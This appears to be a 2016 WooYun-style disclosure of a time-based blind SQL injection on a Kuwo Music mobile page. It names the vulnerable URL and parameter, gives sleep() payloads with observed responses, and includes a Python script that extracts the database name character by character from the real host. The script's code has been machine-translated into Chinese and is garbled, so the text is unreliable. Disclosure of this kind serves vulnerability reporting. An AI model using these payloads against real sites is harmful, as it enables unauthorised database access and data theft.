漏洞标题 酷我音乐某站存在SQL注入(附验证脚本) 相关厂商 酷我音乐 漏洞作者 Vinc 提交时间 2016-04-29 12:12 公开时间 2016-06-16 19:30 漏洞类型 SQL注射…
漏洞标题
酷我的音乐台有SQL注入(带验证脚本)
相关制造商
kuwo音乐
漏洞作者
时Vinc
提交时间
2016-04-29 12: 12
公共时间
2016-06-16 19: 30
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
Sql注入
漏洞详细信息
http://mobile.kuwo.cn/mpage/special/oldSpecail.jsp?specialType=(if(1=2,sleep(5),2))&nowId=1033
(if(1=1,sleep(5),2)):
错误503服务不可用
(如果(1=2,睡眠(5),2)):
返回200
Database()是EDITOR
漏洞证明:

# - * - 编码: utf8 - * -
#编码=UTF-8
导入httplib
进口时间
导入字符串
导入系统
headers={
'User-Agent':'Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/28.0.1500.63 Safari/537.36',
'Referer':'http://ldj.db.17173.com',
}
Payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 @ _。')
打印'[%s]开始重试MySQL数据库()'%time.strftime('%H:%M:%S',time.localtime())
数据库=''
对于范围(1,7,1):中的i
对于有效负载:中的有效负载
试试:
Conn=httplib.HTTPConnection('mobile.kuwo.cn',超时=20)
Conn.request(method='GET',url='/mpage/special/oldSpecail.jsp?specialType=(if(ascii(substr(database(),'+ str(i)+',1))='+ STR(ORD(有效载荷))+ '睡眠(10),1))')
Status=conn.getresponse()。status
Conn.close()
除了例外,e:
打印e
数据库+=有效负载
打印'\ r [+]运行:',数据库
Time.sleep(0.01)
打破
打印''
打印'database()is',数据库
修理计划:
预编译处理
版权声明:请注明出处Vinc @乌云